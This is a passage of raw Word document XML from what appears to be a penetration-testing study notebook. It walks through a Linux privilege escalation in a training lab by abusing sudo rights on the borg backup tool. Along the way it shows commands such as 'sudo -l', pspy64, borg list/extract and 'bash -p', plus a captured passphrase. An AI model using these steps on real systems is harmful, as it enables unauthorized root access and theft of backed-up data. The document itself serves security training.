    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hen we can SSH back into the machine, and then run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get a root shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F14">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r0phz9sd8n48" w:id="268"/>
      <w:bookmarkEnd w:id="268"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Borg (/usr/bin/borg)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Borg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BorgBackup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deduplicating backup program</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> built for efficiently and securely backing up files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4415451" cy="2535269"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="361" name="image364.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image364.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId659"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4415451" cy="2535269"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is cool to know, but not necessary for the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Relia Challenge Lab on 172.16.xxx.19:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/borg list *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F20">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/borg extract *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F21">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/borg mount *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F22">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F23">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how we exploit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More about Borg can be seen in the documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId660">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://borgbackup.readthedocs.io/en/stable/usage/extract.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="303" name="image298.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image298.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId661"/>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F2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see a lot output with borg. And also, you see this PASSPHRASE which will be important when using borg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passphrase is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xinyVzoH2AnJpRK9sfMgBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The most important information is not only the passphrase though. We see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/borgbackup::usb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a lot. In borg, this means</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/borgbackup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the borg repository, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the archive inside of the repo. But, there might be multiple archives in the borg repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command (as seen previously in the output of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to list all archives in the borg repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>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sudo /usr/bin/borg list /opt/borgbackup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will ask for passphrase so give it the one found in pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>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05500" cy="1028700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="374" name="image366.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image366.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId662"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59055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F31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Besides the USB archives, we see a "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" one that looks interesting!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can try and extract that archive and print it to the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/borg extract /opt/borgbackup::home --stdout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses the borg binary to extract the archive named "home"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
